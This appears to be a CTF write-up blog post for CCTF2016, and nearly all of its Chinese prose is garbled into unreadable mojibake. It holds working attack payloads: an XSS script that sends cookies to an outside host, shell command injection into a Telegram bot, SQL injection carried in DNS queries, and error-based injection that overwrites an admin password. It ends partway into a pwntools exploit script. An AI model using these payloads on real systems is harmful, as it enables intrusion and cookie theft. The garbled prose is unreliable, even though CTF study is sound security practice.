LoRexxar's Blog

CCTF2016_writeup

2016/04/25

鍓嶄袱澶╂墦浜0xFA涓惧姙鐨刢ctf锛屽緢骞歌繍鎷垮埌浜嗕笉閿欑殑鍚嶆

绋嶅井鏁寸悊涓媤p

pentest

IDS-Chicken

鐢变簬姣旇禌鐨勬椂鍊欐病鍋氬嚭鏉ワ紝缁撴灉鐪嬩簡wp鍙戠幇灏卞樊涓鐐圭偣鍎库
http://c-chicken.cc/ctf/2016/04/25/IDS-Writeup.html

棣栧厛鎵撳紑鍙戠幇鏄釜ids锛屽鏋滄娴嬪埌mysql鎶ラ敊锛屽氨浼氳褰曞埌鍚庡彴銆
寮濮嬪皾璇曟敞鍏ワ紝浣嗘槸鍙戠幇鐢变簬杩囨护浜唖elect锛屾墍浠ュ苟娌℃湁浠涔堝嵉鐢紝娉ㄤ笉鍒版湁鐢ㄧ殑涓滆タ锛屽悗鏉ョ粰浜唄int锛屽彂鐜板叾瀹炰笉鏄紑濮嬫兂鐨勬敞鍏ラ鐩

1
2
3
4
5
6
http://ids.c-chicken.cc/upload/
http://ids.c-chicken.cc/upload.php
http://ids.c-chicken.cc/conn.php
http://ids.c-chicken.cc/index.php
http://ids.c-chicken.cc/cgi-bin/
http://ids.c-chicken.cc/cgi-bin/printenv.cgi

鈥﹁嚦浜庢渶鍚庣殑涓滆タ锛屽弽姝f垜鏄病鎵埌鈥.
涓嶈繃鎬庝箞璇磋繕鏄壘鍒颁簡upload.php

绋嶅井娴嬭瘯浜嗕笅鍙戠幇浼犱粈涔堥兘娌$敤锛屽彧鏈夊浘鐗囧彲浠ヨ繃锛屼絾鏄浘鐗囪繕琚敼鍚嶉噸鍐欒繃鈥

鍙堢粰浜嗘彁绀猴細
1銆佸彲浠ヤ笂浼犲濯掍綋鏂囦欢
2銆佸悗鍙颁細璁板綍鏀诲嚮

閭d箞鎬濊矾涓涓嬪瓙娓呮櫚浜嗗緢澶氾紝鐚滄祴涓婁紶swf鏂囦欢锛屽鏋滀笉琚鐞嗭紝閭d箞灏卞彲浠ヨ繃CSP锛岄偅涔堝氨鍙互x鍒版兂瑕佺殑涓滆タ浜嗐
娴嬭瘯鍙戠幇澶村繀椤绘湁锛屼絾鏄鏋滄瀯閫犱竴涓猨s鏂囦欢锛屽墠闈㈢殑澶翠細鐖嗛敊锛CWS鏈畾涔鐒跺悗灏变細鍋滄锛堝綋鏃舵病鎯冲埌瑙e喅鍔炴硶锛屽悗鏉ョ湅鍑洪浜虹殑鎬濊矾鍛婅瘔鎴戜滑瑕佸畾涔変竴涓猧d锛岃繖鏍峰氨涓嶄細鎶ラ敊Orz锛,鎴戜娇鐢ㄤ簡```
鍦ㄦ枃浠朵腑鍐欏叆

1
2
3
CWS
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://xss.xxxxx.cc', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send('cookie='+document.cookie); </script>

鐒跺悗

1
<link rel='import' href='/upload/xxxxx'>

杩欐牱浼犲叆锛屽氨浼氭帴鏀跺埌璇锋眰浜

鍙槸娌℃兂鍒扮殑鏄紝娴嬭瘯鐨勬椂鍊欙紝鐢变簬涓嶇煡閬撳悗鍙扮殑璁板綍鏂瑰紡鏄粈涔堟牱鐨勶紝鐚滄祴鏄笉鑳芥姤閿欐垨鑰呰琚玣uck銆傘傘傞偅涔堟垜灏变娇鐢ㄤ簡

1
id=1'#<link xxxxxx>

杩欐牱鐨勮姹傦紝杩樺彂浜嗗姞select鐨勶紝鍚庢潵鍑洪浜哄憡璇夋垜#浼氭妸鍚庨潰鐨勬埅鏂紝琚玣uck涓嶄細琚褰曗..

琛ㄧず蹇冨緢绱傘傘傘

钀濊帀淇变箰閮ㄧ郴鍒

钀濊帀2

鐩爣 锛http://www.loli.club/
鎷垮埌 Web 鐩綍涓嬬殑 flag 鏂囦欢

RR 璇村父瑙勬笚閫忚繃绋, 椤甸潰婧愮爜缁欎簡

powered by PockyNya
璇氭嫑鍓嶇锛岃鑱旂郴閭锛歱ocky@loli.club
鐩存帴涓㈣胺姝屾壘鍒癵ithub涓婃湁pockynya鐨勪俊鎭

https://github.com/PockyNya/pyprint

杩欎竴浠戒唬鐮佹槸閮ㄧ讲鍦

http://pocky.loli.club:41293/

pocky.loli.club (120.27.155.112) 鏉窞闃块噷浜
www.loli.club (47.89.50.241) 棣欐腐闃块噷浜

鐒跺悗濂囨猀AQ锛屽悗鏉ヨ瑙i椤哄簭鍜岄鐩『搴忔棤鍏炽
绾跨▼鍒囧埌pocky.loli.club锛坙oli2锛

缈荤炕鐪嬪彂鐜板崥瀹㈤噷闈㈢殑鏂囩珷

1
2
3
4
5
6
7
鏈杩戦粦闃旂洓琛岋紝鎴戝啣鍐ヤ箣涓劅瑙夊埌鏈杩戞垜鐨 Blog 浼氳涓缇ら粦闃旇闂
鐩墠鎴戝仛浜嗗涓嬭В鍐虫柟妗堬細
瀵嗙爜鏀瑰彉锛屼笉瑕佹槸 username123 杩欑绠鍗曠殑瀵嗙爜锛屽姞涓婁簡鐗规畩瀛楃
鏈杩 Email 鍙偣鍑绘垜鐔熺煡鐨勫湴鍧锛屾瘮濡傛垜鍗氬..2333
鍗氬鐢变簬鏄竴涓憲鍚嶉粦闃旂敤 Python 鍐欑殑锛屾垜鐩镐俊鑲畾娌℃湁鍚勭婕忔礊鍟
鏈嶅姟鍣ㄦ槸闃块噷浜戯紝闃块噷浜戜竴瀹氬緢瀹夊叏鐨勮ww
濂藉儚鏈変釜濂囨牸寮忕殑閭欢娣诲姞鍦ㄦ垜 Github 鐨 Personal settings 鐨 Emails 閲岄潰浜..鍟婏紝涓嶇浜..搴旇娌′粈涔堝ぇ纰嶅惂..

涓婇潰鍩烘湰涓婅鐨勫緢娓呮浜嗭紝璇存槑涓嶆槸寮卞彛浠わ紝涔熶笉鏄痝etshell棰樼洰锛岃屼笖email鍙偣鍑诲崥瀹㈢殑鍦板潃锛岄偅涔堝緢娓呮浜嗭紝搴旇鏄痻ss

鐒跺悗姝ゆ椂鍙戠幇鍦 post 澶氫簡浜涘濂囨殑鏂囩珷銆
鍙戣〃鏂囩珷閮ㄤ唤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
class AddPostHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
self.background_render('add_post.html', post=None)
def post(self):
title = self.get_argument('title', None)
content = self.get_argument('content', None)
tags = self.get_argument('tags', '').strip().split(',')
if not title or not content:
return self.redirect('/kamisama/posts/add')
post = self.orm.query(Post.title).filter(Post.title == title).all()
if post:
return self.write('<script>alert("Title has already existed");window.history.go(-1);</script>')
self.orm.add(Post(title=title, content=content, created_time=date.today()))
self.orm.commit()
return self.redirect('/kamisama/posts')

鍙戠幇鍦ㄦ坊鍔犳枃绔犵殑鍦版柟锛屽苟娌℃湁鍋氱敤鎴风殑楠岃瘉銆
鐚滄兂XSS涓绡囨枃绔犲埌閭璁㏄ockyNya鎴炽

1
2
3
4
5
import requests
url = 鈥渉ttp://pocky.loli.club/kamisama/posts/add鈥
data = {"title":"this is dong", "content": "this is dong"}
requests.post(url, data=data)

杩欓噷鐪熺殑鏄俯浜嗗緢澶х殑鍧戯紝绗竴娆鍒扮殑cookie鍙湁

1
username=2|1:0|10:1461382264|8:username|12:cG9ja3lueWE=|d4e540d298981e80bd48150453751ef3db7a18611d2748f0f1d8cee4484d4958

鐒跺悗鎴戜滑杩涗簡鍚庡彴锛岃櫧鐒舵壘鍒颁簡loli1鐨勫叆鍙o紝浣嗘槸鎯充笉閫氫负浠涔堟病鏈夋壘鍒癴lag锛堣锛氭槸璋佺杩欎釜鐨勶級锛岃姳浜3涓皬鏃剁爺绌惰寰椾笉鍙兘鏈夐棶棰橈紝鎵浠ュ張x浜嗕竴娆★紝杩欐鎷垮埌浜唂lag

flag=343334333534343637623433346634343435356634313535343434393534356634323535353335343435353235333764;

x鍥炴潵鐨刦lag銆

1
2
3
4
5
6
7
8
9
10
11
12
>>> s = '''343334333534343637623433346634343435356634313535343434393534356634323535353335343435353235333764'''
>>> len(s)
96
>>> import binascii
>>> binascii.unhexlify(s)
'434354467b434f44455f41554449545f425553544552537d'
>>> len(binascii.unhexlify(s))
48
>>> s = binascii.unhexlify(s)
>>> binascii.unhexlify(s)
'CCTF{CODE_AUDIT_BUSTERS}'
>>>

绗竴鍙悵鑾夋崟鑾锋垚鍔熴

x鍥炴潵鐨刢ookie鐧婚檰鍚庡彴鐪嬪埌鍚庡彴鏂囩珷

钀濊帀1

鍦ㄥ叕鍙告惌寤轰簡涓 Minecraft 鏈嶅姟鍣ㄦ潵鐫鈥 鐢ㄧ殑瀹樼綉鐨勬湇鍔″櫒锛屾ц兘楂榽 鍐欎簡涓 telegram bot 鏉ョ鐞 Minecraft 鐨勫紑鍚拰鍏抽棴锛屽嚑琛 lua 绠鍗曠殑寰堝憿~ 浠g爜濡備笅锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
do
local function run(msg, matches)
if matches[1] ~= '!minecraft' then
operation = matches[1]
else
return "!minecraft start|stop|restart"
end
if string.find(operation, '&') or string.find(operation, '|') or string.find(operation, '`') then
return "Invalid operation " .. operation
end
local t = io.popen('cd /home/telegram && ./mc ' .. operation)
local a = t:read("*all")
return a
end
return {
description = "loli.club minecraft bot!",
usage = "!minecraft start|stop|restart",
patterns = {
"^!minecraft$",
"^!minecraft (.*)$"
},
run = run
}
end

telegram涓婃悳涓涓婸ockyNya(鏈鎵殑鏄痶elegram涓婃湁涓彨pockybot鐨勮处鎴封)锛岃偗瀹氭槸澶村儚鏈钀岀殑閭d釜銆

!minecraft ;ls /home/wwwroot
!minecraft ;cat /home/wwwroot/flag

CCTF{TELEGRAM_BOT_AND_Lf}

RR 璇碽ot鎷垮畬flag灏辨病鐢ㄤ簡锛屾墍浠ユ病鏈夌户缁帺鈾, 鍡繖涓枃浠跺彨flag

钀濊帀3

鍐呯綉娓楅

鎵煙鍚嶄笉鏄垎鐮存垜ns鏈嶅姟鍣..鑰屼笖ns鏈嶅姟鍣ㄦ槸pockynya鐢╬ython鍜宮ysql寮鍙戠殑锛屼細鏈変粈涔堟紡娲炲憿..

Get Hint!
鎵惧埌浜唍s.loli.club涔嬪悗璇曚簡涓嬩笉瀛樺湪鍩熶紶閫佹紡娲炪
鍐嶈瘯浜嗕笅A璁板綍AAAA璁板綍 TXT 璁板綍 P.S. RR涔熻浜嗕笉婊嬬摲鍏跺畠璁板綍
鍙戠幇pocky.loli.club鐨 TXT 璁板綍杩斿洖 鈥淕OGOGO鈥
鎵浠ョ寽鎯冲簲璇XT璁板綍鏀惧湪mysql鐨勪竴涓瓧娈甸噷闈簡銆
鏌ヨ鏉′欢鏄痶xt 杩樻湁 domain
鐒跺悗鎶婅繖閬撻鍙樻垚浜嗗父瑙剋eb娉ㄥ叆

1
2
3
dig @ns.loli.club -t txt "pocky.loli.club'&&if(mid(version(),1,1)=5,1,0)#"
dig @ns.loli.club -t txt "pocky.loli.club'&&if(mid(version(),1,1)=6,1,0)#"

缁撴灉璇佸疄娉ㄥ叆瀛樺湪銆
union娉ㄥ叆鎵惧埌
dns鏁版嵁搴撲笅鍙湁涓寮爃osts琛
hosts琛ㄤ笅鍙湁涓冩潯璁板綍閮芥病鏈変粈涔堟湁鐢ㄧ殑淇℃伅銆
鎵浠ュ氨鏄痝et system shell.
寮濮嬫棤鑴戝湴缂╃煭payload
鍙戠幇

1
dig @ns.loli.club -t txt "'union(select 1,(select name from mysql.func limit 0,1),3,4)#"

杩斿洖sYsT3m_e
璐村績鐨勫嚭棰樹汉Ricter鍏崇埍 Web 鐙楁妸UDF閮界濂戒簡銆

1
dig @ns.loli.club -t txt "'union(select 1,(select name from mysql.func limit 1,1),3,4)#"

鍙湁涓涓猣unc,澶熶簡銆傜劧鍚庝竴澶存挒鍦ㄤ簡缂╃煭payload鐨勫涓娿
浜岀嫍鍛婃垜涓轰粈涔堜笉down 鍥炶剼鏈紝鏅洪殰涓銆
鐒跺悗鎴戝枈浜嗕竴澹版垜瑕佹嬁涓琛銆傜珛flag鈥
鍙嶅脊shell涔嬪悗锛宖ind / -name flag 鏅洪殰浜屻
鐒跺悗娌℃壘鍒版嚨閫笺 璇曚簡鍏跺畠锛屼篃娌℃湁銆傚氨涓涓竴涓墜鍔ㄥ垏鐩綍銆
鎵惧埌flag鏀惧湪浜咶LAG鏂囦欢閲岄潰銆
绗笁鍙悵鑾夋崟鑾峰畬姣曘

钀濊帀4

RR璇磋繖鏄渶瀹规槗鐨勶紝杩樿甯ぇ瀹惰濂戒簡nmap浜嗐

1
2
3
4
5
6
7
8
9
/etc/hosts
127.0.0.1 localhost
127.0.1.1 localhost.localdomain localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.47.111.200 dns

nmap璺戣捣鏉ユ妸/21鐨勯兘璺戜簡涓閬嶏紝缁х画缂╁皬鐩爣銆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
arp -a
? (120.27.151.247) at 3c:8c:40:4e:dd:46 [ether] on eth1
? (10.47.111.247) at 3c:8c:40:4e:dd:46 [ether] on eth0
? (10.47.111.187) at 00:16:3e:01:02:8b [ether] on eth0
? (10.47.110.23) at 00:16:3e:01:03:33 [ether] on eth0
10.47.111.187寮浜8080鍜屽拰80
8080/tcp open http nginx 1.4.6 (Ubuntu)
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: OPS - LOLI.CLUB
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=4/24%Time=571C607D%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open http nginx 1.4.6 (Ubuntu)
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-title: 404 Not Found

鍐呯綉鍡傘備笂浜嗕釜s5浠g悊銆
鐒跺悗鍦╢orget?(鎵惧洖瀵嗙爜)澶勫彂鐜颁簡娉ㄥ叆銆
瀛﹂暱鍙戠幇鍙互sqlmap璺戯紝浣嗘湁鐐瑰崱銆
鐒跺悗灏辨墜娉ㄤ簡銆

1
email=********%40qq.com') union select updatexml(0,concat(0x27,(select column_name from information_schema.columns where table_name='user' limit 7,1)),0)%23

user琛 濂藉鍒椼傘傛兂鎯虫垜浠殑鐩爣鏄痑dmin鐨勫瘑鐮
鐒跺悗
select password from user where username=鈥*
杩欓噷鍧戜簡涓涓嬶紝鍥犱负鍑烘潵鐨勫瘑鐮佺洿鎺ュ鍒跺嚭鏉ワ紝update鍥炲幓锛屼絾澶辫触浜嗐
鍥犱负鍑烘潵鐨勫瘑鐮佺湅鐫鍍忔槸md5浣嗗叾瀹炲彧鏈31浣嶃
涓轰粈涔堜細杩欐牱瀛愬憿锛
鏄鹃敊娉ㄥ叆鏈夐暱搴﹂檺鍒躲傚叾瀹炲瘑鐮乭ash鍚庡畬鏁撮暱搴﹁秴杩囦簡杩欎釜銆
鐒跺悗灏卞垎涓ゆ鎴彇浜嗗嚭鏉ャ

1
email=********%40qq.com'); update user set password='**********';%23

鐒跺悗浠dmin鐧婚檰锛宖lag灏卞湪鐪煎墠銆

鍥涘彧钀濊帀鎹曡幏瀹屾瘯銆

misc

绛句釜鍒

娌′粈涔堝彲璇寸殑锛孎12瀹℃煡鍏冪礌灏辩湅鍒颁簡..

Best_Easy_Misc

Morse瑙g爜涓涓嬨傚緱鍒板彧鏈0鍜9鐨勫瓧绗﹀叡 1024 涓
32 * 32 = 1024
鎶婂瓧绗︽浛鎹笅鐒跺悗鎵撳嵃鍑烘潵銆
鍙戠幇姘村钩缈昏浆浜嗐

1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/env python
# -*- coding: utf-8 -*-
output = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000099990099999900000000000000000009000090000000090000900000000000000000000000000099099000000000000000000000000000009000000000000009009000000990000000000000000000090909009009090000000000000000000909090090090900009090000000000009090900900909000090900000000000090909009009090000909000000000000999900099999000099990000000000000000000000000000000000000000000000000009000090000000000000000000900090009009000000090000000000009000900009900000000900000000000090009000099000009999000000000000099900009009000000090000000000000000000900009000000900000000000000000000000000000000000000000000999909000000000000000000000000000000000099990900900900000000000000000000000000009009000000000000099999000009900099990000000000000090000000900900000000000000000000090000009009000000000000000000000090000090090090090000000000000999990099999900900900000000000000000000000000009999'
output = output.replace('0', ' ')
output = output.replace('9', '#')
def main():
for j in range(0, len(output), 32):
print output[j:j+32][::-1]
if __name__ == '__main__':
main()

True or False?

True or False?

Hint锛氳繖鏄竴涓帇缂╂枃浠


鎷垮埌鏂囦欢鍚庯紝鍙戠幇骞朵笉鑳借鍑烘槸鍟ユ枃浠讹紝鏍规嵁鎻愮ず璇存槸鍘嬬缉鏂囦欢锛屾悳浜嗕竴浜涘帇缂╂枃浠舵牸寮忕殑magic number锛屾湁鐐瑰儚bz2锛屽彧鏄墠涓や釜瀛楄妭璋冩崲浜嗕竴涓嬩綅缃

1
2
3
4
hex
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 5A 42 68 39 31 41 59 26 53 59 82 D2 45 B8 00 16 ZBh91AY&SY鈥毭扙赂

璋冩崲鍚庯紝鍙互鐩存帴瑙e帇锛屾槸tar.bz2鐨勫帇缂╂牸寮忋傝В鍘嬪悗鏈変袱涓枃浠禩rue鍜孎alse锛屼涪鍒癐DA閲屽幓銆

涓や釜鏂囦欢閮芥墽琛屼簡鍛戒护锛屼絾鏄窡flag姣棤鍏崇郴锛屼絾鏄痶rue鏂囦欢涓彂鐜颁簡涓涓猵rint_f鍑芥暟浼佸浘钂欐贩杩囧叧銆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
c
v14 = "yvahk-enva";
v1 = 'P';
v2 = 'P';
v3 = 'G';
v4 = 'S';
v5 = '{';
v6 = '\0';
v7 = '-';
v8 = 'o';
v9 = 'v';
v10 = 'a';
v11 = '}';
v13 = '\f';
v12 = 0;
return printf("%s%s%s\n", &v1, "yvahk-enva", &v7);

缁勫悎鍑哄瓧绗︿覆锛歅PGS{yvahk-enva-ova}锛孯OT13鍗冲彲寰楀埌flag锛欳CTF{linux-rain-bin}

EZ Game

娴侀噺鍒嗘瀽
鍏堜笉鎵撳紑wireshark,鐩存帴strings寰楀埌寮澶存湁涓涓插鎬殑瀛楃

1
2
echo "Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ==" | base64 -d
CCTF{do_you_like_sniffer}#

绂忓埄棰樸
缁撳悎棰樼洰瑕佹眰锛屾壘鍑烘槸鍝釜娲炵殑exp杩囩▼銆
鍙戠幇鏄痝et浜哻md shell鐨勶紝鎵炬壘璇曡瘯灏卞ソ浜嗐

澶у悕榧庨紟MS08067

Base{瀹夌爜}

MISC1

閮借浜嗘柊鎵嬬鍒╋紝娌′粈涔堝彲璇寸殑

Stegsolve鐩存帴鎵撳紑鍥剧墖锛岀劧鍚庢煡鐪媎ata锛岃Вbase64锛屾湁涓┖鏍肩殑闂鏈夌偣鍎胯泲鐤硷紝涓嶈繃绋嶅井鏀规敼锛屾敼鎴愭湁鎰忎箟鐨勫氨鍙互浜

MISC2

涓嬭浇涓嬫潵鏄釜鏁版嵁鍖咃紝绋嶅井缈荤炕鍛楋紝姣旇緝绠鍗曪紝娌¤閿欐槸鍦╤ttp鍖呬腑鏄庣爜浼犵殑flag锛岀◢寰壘鎵惧氨濂戒簡銆

re1

鏂版墜绂忛煶锛屼笟鐣岃壇蹇冦

flag鎻愪氦鏍煎紡锛

CCTF{flag}

hint锛歠lag鏄綘鐨勮В鍑烘潵鐨勫搰


鐩存帴涓㈠幓IDA锛宎rgc 闇瑕佸ぇ浜3锛屽墠闈㈢殑涓澶ф浠g爜閮芥病浠涔堢敤锛岀洿鎺ョ湅check鍑芥暟锛

1
2
3
4
5
6
7
8
9
10
11
signed int __cdecl check(char *a1)
{
signed int i; // [sp+Ch] [bp-4h]@1
for ( i = 0; i <= 31; ++i )
{
if ( a1[i] != *(i + 0x8048C80) )
return 0;
}
return 1;
}

鎶婅緭鍏ョ殑瀛楃涓插拰0x8048c80杩欎釜鍦板潃鐨勫唴瀹瑰幓姣旇緝锛岃岃繖涓湴鍧鐨勫唴瀹规槸锛

1
.rodata:08048C80 aF2332291a6e1e6 db 'f2332291a6e1e6154f3cf4ad8b7504d8',0

鎵浠ョ洿鎺ユ墽琛岀▼搴忥細

1
2
3
鉃 cctf ./buffer32 f2332291a6e1e6154f3cf4ad8b7504d8 f2332291a6e1e6154f3cf4ad8b7504d8 f2332291a6e1e6154f3cf4ad8b7504d8
Aleph-One
Is The Password. Good Job !

re2

鏂版墜绂忛煶锛屼笟鐣岃壇蹇冦

flag鎻愪氦鏍煎紡锛

CCTF{flag}


.net鍐欑殑锛岀洿鎺ヤ笂Reflector銆
绋嬪簭杩炴帴鍒127.0.0.1鐨31337绔彛锛岀劧鍚庢妸flag鍙戜簡杩囨潵銆
鏈湴鐩戝惉涓涓嬭繖涓鍙o紝鐒跺悗杩愯绋嬪簭灏卞彲浠ヤ簡銆

1
2
3
PS C:\Users\lightless\Desktop\PowerCat> Import-Module .\PowerCat.psd1
PS C:\Users\lightless\Desktop\PowerCat> start-powercat -port 31337
CTF{7eb67b0bb4427e0b43b40b6042670b55}

re3

杩欎釜鍏跺疄娌′粈涔堝ソ鍐欑殑.

鐢╫d鍦╯trcmp鐨勫湴鏂逛笅鏂偣銆傜洿鎺ヨ窇灏卞彲浠ヤ簡銆傜瓑鏂湪鏂偣涔嬪悗灏辩洿鎺ュ湪鏍堜笂鐪嬪埌flag浜嗐

鍥犱负澶畝鍗曞弽鑰屾鐤戜簡涓闃靛瓙Orz

BIN

2048锛4096锛

hint1:2048?4096? Hint: 浠栦滑璇寸帺鍒2048骞朵笉鍘夊锛岀帺鍒4096鐨勪篃涓嶅帀瀹筹紝涓嶄俊浣犲厛閫嗕竴涓
hint2:2048锛4096锛 Hint锛氱湡鐨勬槸鍒嗘暟瓒婇珮鐨勮秺鍘夊锛 2016骞4鏈23鏃16:07
hint3:2048锛4096锛 Hint3锛氬ソ鍚э紝鍜辩湅璋佸垎鏁版渶浣庛傘傘傘傘傘傘傘傘傘傘傘 2016骞4鏈23鏃18:08

閭d箞灏辨槸鎵惧嚭鐞嗚鏈浣庡垎鍜

https://www.zhihu.com/question/23073587

杩欐牱涓鏉ョ悊璁烘渶浣庡垎灏辨槸16鍒嗕簡锛岄偅涔堢悊璁烘渶浣庢鏁板憿锛屼笉鐭ラ亾鈥.
娌″姙娉曪紝璺戣窇鐪嬪惂锛屾渶鍚庤窇鍑烘潵鏄22姝ワ紙鍝綅澶х墰鍛婅瘔鎴戜负浠涔堝晩锛燂級

Difffffffffuse

璁╂垜鏉ヨ涓晠浜

鎴戞妸杩欓亾棰樺彨鍋氾細涓鏌辨搸澶

绗竴娆℃墦寮杩欓锛氫粈涔堢帺鎰忥紝浼拌鏄竴涓櫄鎷熸満鎴栬呭钩鍧﹀寲锛屼唬鐮侀暱鐨勪竴鏌辨搸澶┿

瑙夊緱杩欓瀹屽叏娌℃硶鍋氾紝鎵撳紑浜嗘父鎴忥紝鍗婂皬鏃惰繃鍘讳簡銆傘傘傘傘傞槦鍙嬭窡鎴戣杩欓鏈変汉DONE浜嗐傛垜鎯虫庝箞鍙兘锛岃繖绉嶄笢瑗夸笉鍙兘閭d箞蹇仛鍑烘潵鐨勶紝浜庢槸鍙堟妸瀹冩崱浜嗚捣鏉ャ

1
2
3
4
5
6
7
8
9
10
11
.text:080BB877 mov dword ptr [esp+8], 28h ; n
.text:080BB87F lea eax, [esp+14h]
.text:080BB883 mov [esp+4], eax ; s2
.text:080BB887 lea eax, [esp+3Dh]
.text:080BB88B mov [esp], eax ; s1
.text:080BB88E call _memcmp
.text:080BB893 test eax, eax
.text:080BB895 jnz short loc_80BB8A5
.text:080BB897 mov dword ptr [esp], offset s ; "Yeap!!!"
.text:080BB89E call _puts
.text:080BB8A3 jmp short loc_80BB8B1

鍙互鐪嬪埌memcmp瀵瑰唴瀛樿繘琛屼簡姣旇緝锛屼笅鏂偣鍙戠幇鍙互杩涜鐖嗙牬銆

闇瑕佺殑缁撴灉锛

1
2
3
4
5
6
0xffffcefd: 0x83 0xec 0x5f 0xa2 0x93 0xce 0xe5 0xfb
0xffffcf05: 0x5a 0x17 0x06 0xff 0x89 0x2d 0xd7 0x6c
0xffffcf0d: 0xbe 0xce 0x8d 0x6a 0xb8 0x15 0x26 0xfc
0xffffcf15: 0x84 0x01 0x94 0x44 0xf8 0xd7 0x23 0x1c
0xffffcf1d: 0x4b 0xc2 0x31 0x04 0xa6 0x33 0x08 0x57
0xffffcf25: 0x00 0x00 0x00 0x00

鐒惰屾垜骞朵笉浼歀inux鐨凱atch锛屽彧鑳借嚜宸变汉鑲夌垎鐮碠RZ銆

鍒嗗埆濉叆40涓1鍒10锛屽皬鍐欑殑a鍒皕,涓嬪垝绾匡紝杩涜姣旇緝锛岃幏寰椾簡杩欐牱瀛愮殑涓滆タ锛

CCTF{1F?0u?4n?a_?3v?n93_purpleroc}

鍙互鐚滃嚭鏉ワ紝绗竴涓ぇ鍐欏瓧姣嶇粍鎴愮殑鍗曡瘝鏄痀ou锛岀浜屼釜鐢变簬鎴戠帺杩嘔 WANNA 涔熺寽鐨勫嚭鏉ワ紝绗笁涓悳涓涓?ev?nge鎵惧埌浜嗕竴涓彨鍋氬浠囩殑褰辫鍓с

CCTF{1F_Y0u_W4nNa_R3vEn93_purpleroc}

(ps:杩欎篃鍙玾p锛燂紵锛燂紵锛燂紵)

pwn1

鎵浠ヨ杩欓鐨勬瑙f槸鍟ワ紵

姹囩紪浠g爜鏈韩涓嶆槸寰堝鏉傘俶ain鍑芥暟鐨勬渶鍚庝竴涓猚all ecx鎺у埗eip銆傚悓鏃跺彲浠ユ帶鍒惰烦杞椂鏍堝弬鏁8涓瓧鑺傘

棣栧厛8涓瓧鑺傛瀯閫爎op瀹炲湪澶皯锛屾墍浠ラ渶瑕佸厛杩佺Щ鏍堛傜敤ROPgadget鎵句竴涓嬪彂鐜颁簡

0x08048662 : add byte ptr [eax], al ; lea esp, dword ptr [ebp - 0xc] ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080486cb : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret

鍙互鐢pop ebp,ret;lea esp, dword ptr [ebp - 0xc]杩欐牱鐨勫舰寮忔潵灏嗘爤杩佺Щ鍒颁换鎰忕殑鍦板潃銆傝繖閲岀洿鎺ュ皢鏍堣縼绉诲埌浣嶄簬bss娈电殑buffer缂撳啿鍖轰笂銆傝繖鏍峰瓙rop鐨勯暱搴﹀氨瓒冲浜嗐

浣嗘槸绋嬪簭寰堣幢鐨勫叧闂簡鏍囧噯杈撳叆鐨勮锛屼篃灏辨槸璇寸▼搴忓叏绋嬪彧鏈変竴娆″彲浠ュ啓鍏ョ殑鏈轰細銆傝閬撶悊杩欐牱鐨勯鐩嚭棰樹汉鏈剰鏄敤dl resolve鏉ュ埄鐢ㄧ殑銆傛垜涔熺‘瀹炲皾璇曠敤dl resolve鍐欎簡涓猵oc銆傛湰鍦扮‘瀹炴垚鍔熶簡銆備絾鏄繙绋嬫墦鐨勬椂鍊欑洿鎺G銆

鏃㈢劧姝hВ涓嶆垚锛屽氨鍙兘鎶曟満鍙栧阀浜

棣栧厛锛屽洜涓烘病缁檚o搴撱傛墍浠ュ厛瑕佺煡閬搒o搴撶殑鐗堟湰銆傝繖涓繕濂借銆傚洜涓簉op澶熼暱锛屾墍浠ュ彲浠ュ仛鍒颁换鎰忓湴鍧璇汇備粠got琛ㄤ腑leak鍑轰袱涓嚱鏁扮殑鍦板潃姹備釜宸瘮瀵逛竴涓嬪ぇ姒傚氨鑳界煡閬搒o搴撶殑鐗堟湰浜嗐

鐒跺悗鏄粫杩嘺slr銆傝繖涓病浠涔堝姙娉曪紝杩樺ソ绋嬪簭鏄32浣嶇殑銆俵ibc鐨勫姞杞藉熀鍦板潃鍙湁0x100涓彲鑳姐傛墍浠ョ洿鎺ョ洸璺砽ibc銆傚疄闄呮祴璇曚笅鏉ワ紝鍩烘湰涓400灏濊瘯涔嬪唴閮借兘鍑虹粨鏋溿

鏈鍚庝竴涓棶棰樻槸璋冪敤system鐩存帴绋嬪簭灏辩粓姝簡銆傚疄闄単db璋冭瘯缁撴灉鏄爤杩佺Щ鍚庣殑鏍堝お灏忥紝涓嶈冻浠ystem浣跨敤鐨勫師鍥犮傛棤濂堝彧鑳芥敼鎴愮敤execv鍑芥暟銆傝繕濂藉彲浠ョ洿鎺ュ湪bss娈垫瀯閫犲懡浠よ鍙傛暟锛屾墍浠ラ棶棰樹笉澶с

鏈鍚庣殑鑴氭湰濡備笅

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#! /usr/bin/python
import pwn
pwn.context.log_level = 'debug'
binary = pwn.ELF('/tmp/pwn1')
libc = pwn.ELF('/tmp/libc.so.6')
showdown = 0x08048426
sh = 0x0804A060 + 0x70
pay = '134514276.134520956.134514383.aa'
cmd = "/bin/cat\x00\x00"
